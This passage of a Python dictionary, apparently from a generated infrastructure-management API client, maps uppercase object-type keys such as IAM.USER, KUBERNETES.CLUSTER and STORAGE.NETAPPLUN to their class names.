'IAM.APIKEY': "iam.ApiKey",
'IAM.APPREGISTRATION': "iam.AppRegistration",
'IAM.BANNERMESSAGE': "iam.BannerMessage",
'IAM.CERTIFICATE': "iam.Certificate",
'IAM.CERTIFICATEREQUEST': "iam.CertificateRequest",
'IAM.DOMAINGROUP': "iam.DomainGroup",
'IAM.ENDPOINTPRIVILEGE': "iam.EndPointPrivilege",
'IAM.ENDPOINTROLE': "iam.EndPointRole",
'IAM.ENDPOINTUSER': "iam.EndPointUser",
'IAM.ENDPOINTUSERPOLICY': "iam.EndPointUserPolicy",
'IAM.ENDPOINTUSERROLE': "iam.EndPointUserRole",
'IAM.IDP': "iam.Idp",
'IAM.IDPREFERENCE': "iam.IdpReference",
'IAM.IPACCESSMANAGEMENT': "iam.IpAccessManagement",
'IAM.IPADDRESS': "iam.IpAddress",
'IAM.LDAPGROUP': "iam.LdapGroup",
'IAM.LDAPPOLICY': "iam.LdapPolicy",
'IAM.LDAPPROVIDER': "iam.LdapProvider",
'IAM.LOCALUSERPASSWORD': "iam.LocalUserPassword",
'IAM.LOCALUSERPASSWORDPOLICY': "iam.LocalUserPasswordPolicy",
'IAM.OAUTHTOKEN': "iam.OAuthToken",
'IAM.PERMISSION': "iam.Permission",
'IAM.PRIVATEKEYSPEC': "iam.PrivateKeySpec",
'IAM.PRIVILEGE': "iam.Privilege",
'IAM.PRIVILEGESET': "iam.PrivilegeSet",
'IAM.QUALIFIER': "iam.Qualifier",
'IAM.RESOURCELIMITS': "iam.ResourceLimits",
'IAM.RESOURCEPERMISSION': "iam.ResourcePermission",
'IAM.RESOURCEROLES': "iam.ResourceRoles",
'IAM.ROLE': "iam.Role",
'IAM.SECURITYHOLDER': "iam.SecurityHolder",
'IAM.SERVICEPROVIDER': "iam.ServiceProvider",
'IAM.SESSION': "iam.Session",
'IAM.SESSIONLIMITS': "iam.SessionLimits",
'IAM.SYSTEM': "iam.System",
'IAM.TRUSTPOINT': "iam.TrustPoint",
'IAM.USER': "iam.User",
'IAM.USERGROUP': "iam.UserGroup",
'IAM.USERPREFERENCE': "iam.UserPreference",
'INVENTORY.DEVICEINFO': "inventory.DeviceInfo",
'INVENTORY.DNMOBINDING': "inventory.DnMoBinding",
'INVENTORY.GENERICINVENTORY': "inventory.GenericInventory",
'INVENTORY.GENERICINVENTORYHOLDER': "inventory.GenericInventoryHolder",
'INVENTORY.REQUEST': "inventory.Request",
'IPMIOVERLAN.POLICY': "ipmioverlan.Policy",
'IPPOOL.BLOCKLEASE': "ippool.BlockLease",
'IPPOOL.IPLEASE': "ippool.IpLease",
'IPPOOL.POOL': "ippool.Pool",
'IPPOOL.POOLMEMBER': "ippool.PoolMember",
'IPPOOL.SHADOWBLOCK': "ippool.ShadowBlock",
'IPPOOL.SHADOWPOOL': "ippool.ShadowPool",
'IPPOOL.UNIVERSE': "ippool.Universe",
'IQNPOOL.BLOCK': "iqnpool.Block",
'IQNPOOL.LEASE': "iqnpool.Lease",
'IQNPOOL.POOL': "iqnpool.Pool",
'IQNPOOL.POOLMEMBER': "iqnpool.PoolMember",
'IQNPOOL.UNIVERSE': "iqnpool.Universe",
'IWOTENANT.TENANTSTATUS': "iwotenant.TenantStatus",
'KUBERNETES.ACICNIAPIC': "kubernetes.AciCniApic",
'KUBERNETES.ACICNIPROFILE': "kubernetes.AciCniProfile",
'KUBERNETES.ACICNITENANTCLUSTERALLOCATION': "kubernetes.AciCniTenantClusterAllocation",
'KUBERNETES.ADDONDEFINITION': "kubernetes.AddonDefinition",
'KUBERNETES.ADDONPOLICY': "kubernetes.AddonPolicy",
'KUBERNETES.ADDONREPOSITORY': "kubernetes.AddonRepository",
'KUBERNETES.BAREMETALNODEPROFILE': "kubernetes.BaremetalNodeProfile",
'KUBERNETES.CATALOG': "kubernetes.Catalog",
'KUBERNETES.CLUSTER': "kubernetes.Cluster",
'KUBERNETES.CLUSTERADDONPROFILE': "kubernetes.ClusterAddonProfile",
'KUBERNETES.CLUSTERPROFILE': "kubernetes.ClusterProfile",
'KUBERNETES.CONFIGRESULT': "kubernetes.ConfigResult",
'KUBERNETES.CONFIGRESULTENTRY': "kubernetes.ConfigResultEntry",
'KUBERNETES.CONTAINERRUNTIMEPOLICY': "kubernetes.ContainerRuntimePolicy",
'KUBERNETES.DAEMONSET': "kubernetes.DaemonSet",
'KUBERNETES.DEPLOYMENT': "kubernetes.Deployment",
'KUBERNETES.INGRESS': "kubernetes.Ingress",
'KUBERNETES.NETWORKPOLICY': "kubernetes.NetworkPolicy",
'KUBERNETES.NODE': "kubernetes.Node",
'KUBERNETES.NODEGROUPPROFILE': "kubernetes.NodeGroupProfile",
'KUBERNETES.POD': "kubernetes.Pod",
'KUBERNETES.SERVICE': "kubernetes.Service",
'KUBERNETES.STATEFULSET': "kubernetes.StatefulSet",
'KUBERNETES.SYSCONFIGPOLICY': "kubernetes.SysConfigPolicy",
'KUBERNETES.TRUSTEDREGISTRIESPOLICY': "kubernetes.TrustedRegistriesPolicy",
'KUBERNETES.VERSION': "kubernetes.Version",
'KUBERNETES.VERSIONPOLICY': "kubernetes.VersionPolicy",
'KUBERNETES.VIRTUALMACHINEINFRACONFIGPOLICY': "kubernetes.VirtualMachineInfraConfigPolicy",
'KUBERNETES.VIRTUALMACHINEINFRASTRUCTUREPROVIDER': "kubernetes.VirtualMachineInfrastructureProvider",
'KUBERNETES.VIRTUALMACHINEINSTANCETYPE': "kubernetes.VirtualMachineInstanceType",
'KUBERNETES.VIRTUALMACHINENODEPROFILE': "kubernetes.VirtualMachineNodeProfile",
'KVM.POLICY': "kvm.Policy",
'KVM.SESSION': "kvm.Session",
'KVM.TUNNEL': "kvm.Tunnel",
'LICENSE.ACCOUNTLICENSEDATA': "license.AccountLicenseData",
'LICENSE.CUSTOMEROP': "license.CustomerOp",
'LICENSE.IKSCUSTOMEROP': "license.IksCustomerOp",
'LICENSE.IKSLICENSECOUNT': "license.IksLicenseCount",
'LICENSE.IWOCUSTOMEROP': "license.IwoCustomerOp",
'LICENSE.IWOLICENSECOUNT': "license.IwoLicenseCount",
'LICENSE.LICENSEINFO': "license.LicenseInfo",
'LICENSE.LICENSERESERVATIONOP': "license.LicenseReservationOp",
'LICENSE.SMARTLICENSETOKEN': "license.SmartlicenseToken",
'LS.SERVICEPROFILE': "ls.ServiceProfile",
'MACPOOL.IDBLOCK': "macpool.IdBlock",
'MACPOOL.LEASE': "macpool.Lease",
'MACPOOL.POOL': "macpool.Pool",
'MACPOOL.POOLMEMBER': "macpool.PoolMember",
'MACPOOL.UNIVERSE': "macpool.Universe",
'MANAGEMENT.CONTROLLER': "management.Controller",
'MANAGEMENT.ENTITY': "management.Entity",
'MANAGEMENT.INTERFACE': "management.Interface",
'MEMORY.ARRAY': "memory.Array",
'MEMORY.PERSISTENTMEMORYCONFIGRESULT': "memory.PersistentMemoryConfigResult",
'MEMORY.PERSISTENTMEMORYCONFIGURATION': "memory.PersistentMemoryConfiguration",
'MEMORY.PERSISTENTMEMORYNAMESPACE': "memory.PersistentMemoryNamespace",
'MEMORY.PERSISTENTMEMORYNAMESPACECONFIGRESULT': "memory.PersistentMemoryNamespaceConfigResult",
'MEMORY.PERSISTENTMEMORYPOLICY': "memory.PersistentMemoryPolicy",
'MEMORY.PERSISTENTMEMORYREGION': "memory.PersistentMemoryRegion",
'MEMORY.PERSISTENTMEMORYUNIT': "memory.PersistentMemoryUnit",
'MEMORY.UNIT': "memory.Unit",
'META.DEFINITION': "meta.Definition",
'NETWORK.ELEMENT': "network.Element",
'NETWORK.ELEMENTSUMMARY': "network.ElementSummary",
'NETWORK.FCZONEINFO': "network.FcZoneInfo",
'NETWORK.VLANPORTINFO': "network.VlanPortInfo",
'NETWORKCONFIG.POLICY': "networkconfig.Policy",
'NIAAPI.APICCCOPOST': "niaapi.ApicCcoPost",
'NIAAPI.APICFIELDNOTICE': "niaapi.ApicFieldNotice",
'NIAAPI.APICHWEOL': "niaapi.ApicHweol",
'NIAAPI.APICLATESTMAINTAINEDRELEASE': "niaapi.ApicLatestMaintainedRelease",
'NIAAPI.APICRELEASERECOMMEND': "niaapi.ApicReleaseRecommend",
'NIAAPI.APICSWEOL': "niaapi.ApicSweol",
'NIAAPI.DCNMCCOPOST': "niaapi.DcnmCcoPost",
'NIAAPI.DCNMFIELDNOTICE': "niaapi.DcnmFieldNotice",
'NIAAPI.DCNMHWEOL': "niaapi.DcnmHweol",
'NIAAPI.DCNMLATESTMAINTAINEDRELEASE': "niaapi.DcnmLatestMaintainedRelease",
'NIAAPI.DCNMRELEASERECOMMEND': "niaapi.DcnmReleaseRecommend",
'NIAAPI.DCNMSWEOL': "niaapi.DcnmSweol",
'NIAAPI.FILEDOWNLOADER': "niaapi.FileDownloader",
'NIAAPI.NIAMETADATA': "niaapi.NiaMetadata",
'NIAAPI.NIBFILEDOWNLOADER': "niaapi.NibFileDownloader",
'NIAAPI.NIBMETADATA': "niaapi.NibMetadata",
'NIAAPI.VERSIONREGEX': "niaapi.VersionRegex",
'NIATELEMETRY.AAALDAPPROVIDERDETAILS': "niatelemetry.AaaLdapProviderDetails",
'NIATELEMETRY.AAARADIUSPROVIDERDETAILS': "niatelemetry.AaaRadiusProviderDetails",
'NIATELEMETRY.AAATACACSPROVIDERDETAILS': "niatelemetry.AaaTacacsProviderDetails",
'NIATELEMETRY.APICAPPPLUGINDETAILS': "niatelemetry.ApicAppPluginDetails",
'NIATELEMETRY.APICCOREFILEDETAILS': "niatelemetry.ApicCoreFileDetails",
'NIATELEMETRY.APICDBGEXPRSEXPORTDEST': "niatelemetry.ApicDbgexpRsExportDest",
'NIATELEMETRY.APICDBGEXPRSTSSCHEDULER': "niatelemetry.ApicDbgexpRsTsScheduler",
'NIATELEMETRY.APICFANDETAILS': "niatelemetry.ApicFanDetails",
'NIATELEMETRY.APICFEXDETAILS': "niatelemetry.ApicFexDetails",
'NIATELEMETRY.APICFLASHDETAILS': "niatelemetry.ApicFlashDetails",
'NIATELEMETRY.APICNTPAUTH': "niatelemetry.ApicNtpAuth",
'NIATELEMETRY.APICPSUDETAILS': "niatelemetry.ApicPsuDetails",
'NIATELEMETRY.APICREALMDETAILS': "niatelemetry.ApicRealmDetails",
'NIATELEMETRY.APICSNMPCLIENTGRPDETAILS': "niatelemetry.ApicSnmpClientGrpDetails",
'NIATELEMETRY.APICSNMPCOMMUNITYACCESSDETAILS': "niatelemetry.ApicSnmpCommunityAccessDetails",
'NIATELEMETRY.APICSNMPCOMMUNITYDETAILS': "niatelemetry.ApicSnmpCommunityDetails",
'NIATELEMETRY.APICSNMPTRAPDETAILS': "niatelemetry.ApicSnmpTrapDetails",
'NIATELEMETRY.APICSNMPTRAPFWDSERVERDETAILS': "niatelemetry.ApicSnmpTrapFwdServerDetails",
'NIATELEMETRY.APICSNMPVERSIONTHREEDETAILS': "niatelemetry.ApicSnmpVersionThreeDetails",
'NIATELEMETRY.APICSYSLOGGRP': "niatelemetry.ApicSysLogGrp",
'NIATELEMETRY.APICSYSLOGSRC': "niatelemetry.ApicSysLogSrc",
'NIATELEMETRY.APICTRANSCEIVERDETAILS': "niatelemetry.ApicTransceiverDetails",
'NIATELEMETRY.APICUIPAGECOUNTS': "niatelemetry.ApicUiPageCounts",
'NIATELEMETRY.APPDETAILS': "niatelemetry.AppDetails",
'NIATELEMETRY.COMMONPOLICIES': "niatelemetry.CommonPolicies",
'NIATELEMETRY.DCNMFANDETAILS': "niatelemetry.DcnmFanDetails",
'NIATELEMETRY.DCNMFEXDETAILS': "niatelemetry.DcnmFexDetails",
'NIATELEMETRY.DCNMMODULEDETAILS': "niatelemetry.DcnmModuleDetails",
'NIATELEMETRY.DCNMPSUDETAILS': "niatelemetry.DcnmPsuDetails",
'NIATELEMETRY.DCNMTRANSCEIVERDETAILS': "niatelemetry.DcnmTransceiverDetails",
'NIATELEMETRY.EPG': "niatelemetry.Epg",
'NIATELEMETRY.FABRICMODULEDETAILS': "niatelemetry.FabricModuleDetails",
'NIATELEMETRY.FABRICPODPROFILE': "niatelemetry.FabricPodProfile",
'NIATELEMETRY.FABRICPODSS': "niatelemetry.FabricPodSs",
'NIATELEMETRY.FAULT': "niatelemetry.Fault",
'NIATELEMETRY.HTTPSACLCONTRACTDETAILS': "niatelemetry.HttpsAclContractDetails",
'NIATELEMETRY.HTTPSACLCONTRACTFILTERMAP': "niatelemetry.HttpsAclContractFilterMap",
'NIATELEMETRY.HTTPSACLEPGCONTRACTMAP': "niatelemetry.HttpsAclEpgContractMap",
'NIATELEMETRY.HTTPSACLEPGDETAILS': "niatelemetry.HttpsAclEpgDetails",
'NIATELEMETRY.HTTPSACLFILTERDETAILS': "niatelemetry.HttpsAclFilterDetails",
'NIATELEMETRY.LC': "niatelemetry.Lc",
'NIATELEMETRY.MSOCONTRACTDETAILS': "niatelemetry.MsoContractDetails",
'NIATELEMETRY.MSOEPGDETAILS': "niatelemetry.MsoEpgDetails",
'NIATELEMETRY.MSOSCHEMADETAILS': "niatelemetry.MsoSchemaDetails",
'NIATELEMETRY.MSOSITEDETAILS': "niatelemetry.MsoSiteDetails",
'NIATELEMETRY.MSOTENANTDETAILS': "niatelemetry.MsoTenantDetails",
'NIATELEMETRY.NEXUSDASHBOARDCONTROLLERDETAILS': "niatelemetry.NexusDashboardControllerDetails",
'NIATELEMETRY.NEXUSDASHBOARDDETAILS': "niatelemetry.NexusDashboardDetails",
'NIATELEMETRY.NEXUSDASHBOARDMEMORYDETAILS': "niatelemetry.NexusDashboardMemoryDetails",
'NIATELEMETRY.NEXUSDASHBOARDS': "niatelemetry.NexusDashboards",
'NIATELEMETRY.NIAFEATUREUSAGE': "niatelemetry.NiaFeatureUsage",
'NIATELEMETRY.NIAINVENTORY': "niatelemetry.NiaInventory",
'NIATELEMETRY.NIAINVENTORYDCNM': "niatelemetry.NiaInventoryDcnm",
'NIATELEMETRY.NIAINVENTORYFABRIC': "niatelemetry.NiaInventoryFabric",
'NIATELEMETRY.NIALICENSESTATE': "niatelemetry.NiaLicenseState",
'NIATELEMETRY.PASSWORDSTRENGTHCHECK': "niatelemetry.PasswordStrengthCheck",
'NIATELEMETRY.PODCOMMPOLICIES': "niatelemetry.PodCommPolicies",
'NIATELEMETRY.PODSNMPPOLICIES': "niatelemetry.PodSnmpPolicies",
'NIATELEMETRY.PODTIMESERVERPOLICIES': "niatelemetry.PodTimeServerPolicies",
'NIATELEMETRY.SITEINVENTORY': "niatelemetry.SiteInventory",
'NIATELEMETRY.SNMPSRC': "niatelemetry.SnmpSrc",
'NIATELEMETRY.SSHVERSIONTWO': "niatelemetry.SshVersionTwo",
'NIATELEMETRY.SUPERVISORMODULEDETAILS': "niatelemetry.SupervisorModuleDetails",
'NIATELEMETRY.SYSLOGREMOTEDEST': "niatelemetry.SyslogRemoteDest",
'NIATELEMETRY.SYSLOGSYSMSG': "niatelemetry.SyslogSysMsg",
'NIATELEMETRY.SYSLOGSYSMSGFACFILTER': "niatelemetry.SyslogSysMsgFacFilter",
'NIATELEMETRY.SYSTEMCONTROLLERDETAILS': "niatelemetry.SystemControllerDetails",
'NIATELEMETRY.TENANT': "niatelemetry.Tenant",
'NOTIFICATION.ACCOUNTSUBSCRIPTION': "notification.AccountSubscription",
'NTP.POLICY': "ntp.Policy",
'OAUTH.ACCESSTOKEN': "oauth.AccessToken",
'OAUTH.AUTHORIZATION': "oauth.Authorization",
'OPRS.DEPLOYMENT': "oprs.Deployment",
'OPRS.SYNCTARGETLISTMESSAGE': "oprs.SyncTargetListMessage",
'ORGANIZATION.ORGANIZATION': "organization.Organization",
'OS.BULKINSTALLINFO': "os.BulkInstallInfo",
'OS.CATALOG': "os.Catalog",
'OS.CONFIGURATIONFILE': "os.ConfigurationFile",
'OS.DISTRIBUTION': "os.Distribution",
'OS.INSTALL': "os.Install",
'OS.OSSUPPORT': "os.OsSupport",
'OS.SUPPORTEDVERSION': "os.SupportedVersion",
'OS.TEMPLATEFILE': "os.TemplateFile",
'OS.VALIDINSTALLTARGET': "os.ValidInstallTarget",
'PCI.COPROCESSORCARD': "pci.CoprocessorCard",
'PCI.DEVICE': "pci.Device",
'PCI.LINK': "pci.Link",
'PCI.SWITCH': "pci.Switch",
'PORT.GROUP': "port.Group",
'PORT.MACBINDING': "port.MacBinding",
'PORT.SUBGROUP': "port.SubGroup",
'POWER.CONTROLSTATE': "power.ControlState",
'POWER.POLICY': "power.Policy",
'PROCESSOR.UNIT': "processor.Unit",
'RACK.UNITPERSONALITY': "rack.UnitPersonality",
'RECOMMENDATION.CAPACITYRUNWAY': "recommendation.CapacityRunway",
'RECOMMENDATION.PHYSICALITEM': "recommendation.PhysicalItem",
'RECOVERY.BACKUPCONFIGPOLICY': "recovery.BackupConfigPolicy",
'RECOVERY.BACKUPPROFILE': "recovery.BackupProfile",
'RECOVERY.CONFIGRESULT': "recovery.ConfigResult",
'RECOVERY.CONFIGRESULTENTRY': "recovery.ConfigResultEntry",
'RECOVERY.ONDEMANDBACKUP': "recovery.OnDemandBackup",
'RECOVERY.RESTORE': "recovery.Restore",
'RECOVERY.SCHEDULECONFIGPOLICY': "recovery.ScheduleConfigPolicy",
'RESOURCE.GROUP': "resource.Group",
'RESOURCE.GROUPMEMBER': "resource.GroupMember",
'RESOURCE.LICENSERESOURCECOUNT': "resource.LicenseResourceCount",
'RESOURCE.MEMBERSHIP': "resource.Membership",
'RESOURCE.MEMBERSHIPHOLDER': "resource.MembershipHolder",
'RESOURCE.RESERVATION': "resource.Reservation",
'RESOURCEPOOL.LEASE': "resourcepool.Lease",
'RESOURCEPOOL.LEASERESOURCE': "resourcepool.LeaseResource",
'RESOURCEPOOL.POOL': "resourcepool.Pool",
'RESOURCEPOOL.POOLMEMBER': "resourcepool.PoolMember",
'RESOURCEPOOL.UNIVERSE': "resourcepool.Universe",
'RPROXY.REVERSEPROXY': "rproxy.ReverseProxy",
'SDCARD.POLICY': "sdcard.Policy",
'SDWAN.PROFILE': "sdwan.Profile",
'SDWAN.ROUTERNODE': "sdwan.RouterNode",
'SDWAN.ROUTERPOLICY': "sdwan.RouterPolicy",
'SDWAN.VMANAGEACCOUNTPOLICY': "sdwan.VmanageAccountPolicy",
'SEARCH.SEARCHITEM': "search.SearchItem",
'SEARCH.TAGITEM': "search.TagItem",
'SECURITY.UNIT': "security.Unit",
'SERVER.CONFIGCHANGEDETAIL': "server.ConfigChangeDetail",
'SERVER.CONFIGIMPORT': "server.ConfigImport",
'SERVER.CONFIGRESULT': "server.ConfigResult",
'SERVER.CONFIGRESULTENTRY': "server.ConfigResultEntry",
'SERVER.PROFILE': "server.Profile",
'SERVER.PROFILETEMPLATE': "server.ProfileTemplate",
'SMTP.POLICY': "smtp.Policy",
'SNMP.POLICY': "snmp.Policy",
'SOFTWARE.APPLIANCEDISTRIBUTABLE': "software.ApplianceDistributable",
'SOFTWARE.DOWNLOADHISTORY': "software.DownloadHistory",
'SOFTWARE.HCLMETA': "software.HclMeta",
'SOFTWARE.HYPERFLEXBUNDLEDISTRIBUTABLE': "software.HyperflexBundleDistributable",
'SOFTWARE.HYPERFLEXDISTRIBUTABLE': "software.HyperflexDistributable",
'SOFTWARE.RELEASEMETA': "software.ReleaseMeta",
'SOFTWARE.SOLUTIONDISTRIBUTABLE': "software.SolutionDistributable",
'SOFTWARE.UCSDBUNDLEDISTRIBUTABLE': "software.UcsdBundleDistributable",
'SOFTWARE.UCSDDISTRIBUTABLE': "software.UcsdDistributable",
'SOFTWAREREPOSITORY.AUTHORIZATION': "softwarerepository.Authorization",
'SOFTWAREREPOSITORY.CACHEDIMAGE': "softwarerepository.CachedImage",
'SOFTWAREREPOSITORY.CATALOG': "softwarerepository.Catalog",
'SOFTWAREREPOSITORY.CATEGORYMAPPER': "softwarerepository.CategoryMapper",
'SOFTWAREREPOSITORY.CATEGORYMAPPERMODEL': "softwarerepository.CategoryMapperModel",
'SOFTWAREREPOSITORY.CATEGORYSUPPORTCONSTRAINT': "softwarerepository.CategorySupportConstraint",
'SOFTWAREREPOSITORY.DOWNLOADSPEC': "softwarerepository.DownloadSpec",
'SOFTWAREREPOSITORY.OPERATINGSYSTEMFILE': "softwarerepository.OperatingSystemFile",
'SOFTWAREREPOSITORY.RELEASE': "softwarerepository.Release",
'SOL.POLICY': "sol.Policy",
'SSH.POLICY': "ssh.Policy",
'STORAGE.CONTROLLER': "storage.Controller",
'STORAGE.DISKGROUP': "storage.DiskGroup",
'STORAGE.DISKSLOT': "storage.DiskSlot",
'STORAGE.DRIVEGROUP': "storage.DriveGroup",
'STORAGE.ENCLOSURE': "storage.Enclosure",
'STORAGE.ENCLOSUREDISK': "storage.EnclosureDisk",
'STORAGE.ENCLOSUREDISKSLOTEP': "storage.EnclosureDiskSlotEp",
'STORAGE.FLEXFLASHCONTROLLER': "storage.FlexFlashController",
'STORAGE.FLEXFLASHCONTROLLERPROPS': "storage.FlexFlashControllerProps",
'STORAGE.FLEXFLASHPHYSICALDRIVE': "storage.FlexFlashPhysicalDrive",
'STORAGE.FLEXFLASHVIRTUALDRIVE': "storage.FlexFlashVirtualDrive",
'STORAGE.FLEXUTILCONTROLLER': "storage.FlexUtilController",
'STORAGE.FLEXUTILPHYSICALDRIVE': "storage.FlexUtilPhysicalDrive",
'STORAGE.FLEXUTILVIRTUALDRIVE': "storage.FlexUtilVirtualDrive",
'STORAGE.HITACHIARRAY': "storage.HitachiArray",
'STORAGE.HITACHICONTROLLER': "storage.HitachiController",
'STORAGE.HITACHIDISK': "storage.HitachiDisk",
'STORAGE.HITACHIHOST': "storage.HitachiHost",
'STORAGE.HITACHIHOSTLUN': "storage.HitachiHostLun",
'STORAGE.HITACHIPARITYGROUP': "storage.HitachiParityGroup",
'STORAGE.HITACHIPOOL': "storage.HitachiPool",
'STORAGE.HITACHIPORT': "storage.HitachiPort",
'STORAGE.HITACHIVOLUME': "storage.HitachiVolume",
'STORAGE.HYPERFLEXSTORAGECONTAINER': "storage.HyperFlexStorageContainer",
'STORAGE.HYPERFLEXVOLUME': "storage.HyperFlexVolume",
'STORAGE.ITEM': "storage.Item",
'STORAGE.NETAPPAGGREGATE': "storage.NetAppAggregate",
'STORAGE.NETAPPBASEDISK': "storage.NetAppBaseDisk",
'STORAGE.NETAPPCLUSTER': "storage.NetAppCluster",
'STORAGE.NETAPPETHERNETPORT': "storage.NetAppEthernetPort",
'STORAGE.NETAPPEXPORTPOLICY': "storage.NetAppExportPolicy",
'STORAGE.NETAPPFCINTERFACE': "storage.NetAppFcInterface",
'STORAGE.NETAPPFCPORT': "storage.NetAppFcPort",
'STORAGE.NETAPPINITIATORGROUP': "storage.NetAppInitiatorGroup",
'STORAGE.NETAPPIPINTERFACE': "storage.NetAppIpInterface",
'STORAGE.NETAPPLICENSE': "storage.NetAppLicense",
'STORAGE.NETAPPLUN': "storage.NetAppLun",
'STORAGE.NETAPPLUNMAP': "storage.NetAppLunMap",
'STORAGE.NETAPPNODE': "storage.NetAppNode",
'STORAGE.NETAPPNTPSERVER': "storage.NetAppNtpServer",
'STORAGE.NETAPPSENSOR': "storage.NetAppSensor",
'STORAGE.NETAPPSTORAGEVM': "storage.NetAppStorageVm",
'STORAGE.NETAPPVOLUME': "storage.NetAppVolume",
'STORAGE.NETAPPVOLUMESNAPSHOT': "storage.NetAppVolumeSnapshot",
'STORAGE.PHYSICALDISK': "storage.PhysicalDisk",
'STORAGE.PHYSICALDISKEXTENSION': "storage.PhysicalDiskExtension",
'STORAGE.PHYSICALDISKUSAGE': "storage.PhysicalDiskUsage",
'STORAGE.PUREARRAY': "storage.PureArray",
'STORAGE.PURECONTROLLER': "storage.PureController",
'STORAGE.PUREDISK': "storage.PureDisk",
'STORAGE.PUREHOST': "storage.PureHost",
'STORAGE.PUREHOSTGROUP': "storage.PureHostGroup",
'STORAGE.PUREHOSTLUN': "storage.PureHostLun",
'STORAGE.PUREPORT': "storage.PurePort",
'STORAGE.PUREPROTECTIONGROUP': "storage.PureProtectionGroup",
'STORAGE.PUREPROTECTIONGROUPSNAPSHOT': "storage.PureProtectionGroupSnapshot",
'STORAGE.PUREREPLICATIONSCHEDULE': "storage.PureReplicationSchedule",
'STORAGE.PURESNAPSHOTSCHEDULE': "storage.PureSnapshotSchedule",
'STORAGE.PUREVOLUME': "storage.PureVolume",
'STORAGE.PUREVOLUMESNAPSHOT': "storage.PureVolumeSnapshot",
'STORAGE.SASEXPANDER': "storage.SasExpander",
'STORAGE.SASPORT': "storage.SasPort",
'STORAGE.SPAN': "storage.Span",
'STORAGE.STORAGEPOLICY': "storage.StoragePolicy",
'STORAGE.VDMEMBEREP': "storage.VdMemberEp",
'STORAGE.VIRTUALDRIVE': "storage.VirtualDrive",
'STORAGE.VIRTUALDRIVECONTAINER': "storage.VirtualDriveContainer",
'STORAGE.VIRTUALDRIVEEXTENSION': "storage.VirtualDriveExtension",
'STORAGE.VIRTUALDRIVEIDENTITY': "storage.VirtualDriveIdentity",
'SYSLOG.POLICY': "syslog.Policy",
'TAM.ADVISORYCOUNT': "tam.AdvisoryCount",
'TAM.ADVISORYDEFINITION': "tam.AdvisoryDefinition",
'TAM.ADVISORYINFO': "tam.AdvisoryInfo",
'TAM.ADVISORYINSTANCE': "tam.AdvisoryInstance",
'TAM.SECURITYADVISORY': "tam.SecurityAdvisory",
'TASK.HITACHISCOPEDINVENTORY': "task.HitachiScopedInventory",
'TASK.HYPERFLEXSCOPEDINVENTORY': "task.HyperflexScopedInventory",
'TASK.IWESCOPEDINVENTORY': "task.IweScopedInventory",
'TASK.NETAPPSCOPEDINVENTORY': "task.NetAppScopedInventory",
'TASK.PUBLICCLOUDSCOPEDINVENTORY': "task.PublicCloudScopedInventory",
'TASK.PURESCOPEDINVENTORY': "task.PureScopedInventory",
'TASK.SERVERSCOPEDINVENTORY': "task.ServerScopedInventory",
'TECHSUPPORTMANAGEMENT.COLLECTIONCONTROLPOLICY': "techsupportmanagement.CollectionControlPolicy",
'TECHSUPPORTMANAGEMENT.DOWNLOAD': "techsupportmanagement.Download",
'TECHSUPPORTMANAGEMENT.TECHSUPPORTBUNDLE': "techsupportmanagement.TechSupportBundle",
'TECHSUPPORTMANAGEMENT.TECHSUPPORTSTATUS': "techsupportmanagement.TechSupportStatus",
'TERMINAL.AUDITLOG': "terminal.AuditLog",
'TERRAFORM.EXECUTOR': "terraform.Executor",
'THERMAL.POLICY': "thermal.Policy",
'TOP.SYSTEM': "top.System",
'UCSD.BACKUPINFO': "ucsd.BackupInfo",
'UUIDPOOL.BLOCK': "uuidpool.Block",
'UUIDPOOL.POOL': "uuidpool.Pool",
'UUIDPOOL.POOLMEMBER': "uuidpool.PoolMember",
'UUIDPOOL.UNIVERSE': "uuidpool.Universe",
'UUIDPOOL.UUIDLEASE': "uuidpool.UuidLease",
'VIRTUALIZATION.CISCOHYPERVISORMANAGER': "virtualization.CiscoHypervisorManager",
'VIRTUALIZATION.ESXICONSOLE': "virtualization.EsxiConsole",
'VIRTUALIZATION.HOST': "virtualization.Host",
'VIRTUALIZATION.IWECLUSTER': "virtualization.IweCluster",
'VIRTUALIZATION.IWEDATACENTER': "virtualization.IweDatacenter",
'VIRTUALIZATION.IWEDVUPLINK': "virtualization.IweDvUplink",
'VIRTUALIZATION.IWEDVSWITCH': "virtualization.IweDvswitch",
'VIRTUALIZATION.IWEHOST': "virtualization.IweHost",
'VIRTUALIZATION.IWEHOSTINTERFACE': "virtualization.IweHostInterface",
'VIRTUALIZATION.IWEHOSTVSWITCH': "virtualization.IweHostVswitch",
'VIRTUALIZATION.IWENETWORK': "virtualization.IweNetwork",
'VIRTUALIZATION.IWEVIRTUALDISK': "virtualization.IweVirtualDisk",
'VIRTUALIZATION.IWEVIRTUALMACHINE': "virtualization.IweVirtualMachine",
'VIRTUALIZATION.IWEVIRTUALMACHINENETWORKINTERFACE': "virtualization.IweVirtualMachineNetworkInterface",
'VIRTUALIZATION.VIRTUALDISK': "virtualization.VirtualDisk",
'VIRTUALIZATION.VIRTUALMACHINE': "virtualization.VirtualMachine",
'VIRTUALIZATION.VIRTUALNETWORK': "virtualization.VirtualNetwork",
'VIRTUALIZATION.VMWARECLUSTER': "virtualization.VmwareCluster",
'VIRTUALIZATION.VMWAREDATACENTER': "virtualization.VmwareDatacenter",
'VIRTUALIZATION.VMWAREDATASTORE': "virtualization.VmwareDatastore",
'VIRTUALIZATION.VMWAREDATASTORECLUSTER': "virtualization.VmwareDatastoreCluster",
'VIRTUALIZATION.VMWAREDISTRIBUTEDNETWORK': "virtualization.VmwareDistributedNetwork",
'VIRTUALIZATION.VMWAREDISTRIBUTEDSWITCH': "virtualization.VmwareDistributedSwitch",
'VIRTUALIZATION.VMWAREFOLDER': "virtualization.VmwareFolder",
'VIRTUALIZATION.VMWAREHOST': "virtualization.VmwareHost",
'VIRTUALIZATION.VMWAREKERNELNETWORK': "virtualization.VmwareKernelNetwork",
'VIRTUALIZATION.VMWARENETWORK': "virtualization.VmwareNetwork",
'VIRTUALIZATION.VMWAREPHYSICALNETWORKINTERFACE': "virtualization.VmwarePhysicalNetworkInterface",
'VIRTUALIZATION.VMWAREUPLINKPORT': "virtualization.VmwareUplinkPort",
'VIRTUALIZATION.VMWAREVCENTER': "virtualization.VmwareVcenter",
'VIRTUALIZATION.VMWAREVIRTUALDISK': "virtualization.VmwareVirtualDisk",
'VIRTUALIZATION.VMWAREVIRTUALMACHINE': "virtualization.VmwareVirtualMachine",
'VIRTUALIZATION.VMWAREVIRTUALMACHINESNAPSHOT': "virtualization.VmwareVirtualMachineSnapshot",
'VIRTUALIZATION.VMWAREVIRTUALNETWORKINTERFACE': "virtualization.VmwareVirtualNetworkInterface",
